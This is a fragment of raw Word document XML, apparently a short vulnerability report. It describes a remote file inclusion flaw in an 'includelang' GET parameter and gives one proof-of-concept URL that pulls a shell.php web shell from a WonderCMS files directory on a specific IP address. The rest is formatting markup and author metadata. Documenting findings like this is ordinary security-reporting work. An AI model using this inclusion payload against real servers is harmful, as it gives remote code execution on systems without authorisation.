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616E1" w14:textId="786DA8CC" w:rsidR="008F1642" w:rsidRDefault="000137AD">
      <w:r>
        <w:t xml:space="preserve">RFI vulnerability exists in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>includelang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> GET parameter in </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00BE0118">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://13.127.11.167/?includelang=http://13.127.11.167/wondercms/files/shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="424F6293" w14:textId="21F1A3FB" w:rsidR="000137AD" w:rsidRDefault="000137AD"/>
    <w:p w14:paraId="4E2C900D" w14:textId="2E955F71" w:rsidR="000137AD" w:rsidRDefault="000137AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337B4AFE" wp14:editId="427BE769">
            <wp:extent cx="5731510" cy="611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3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AD"/>
    <w:rsid w:val="000137AD"/>
    <w:rsid w:val="008F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A49E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9A365974-D96E-4607-AE87-35AD1E43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7A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7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7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3.127.11.167/?includelang=http://13.127.11.167/wondercms/files/shell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Vadhera</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Abhinav Vadhera</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-27T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-27T11:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>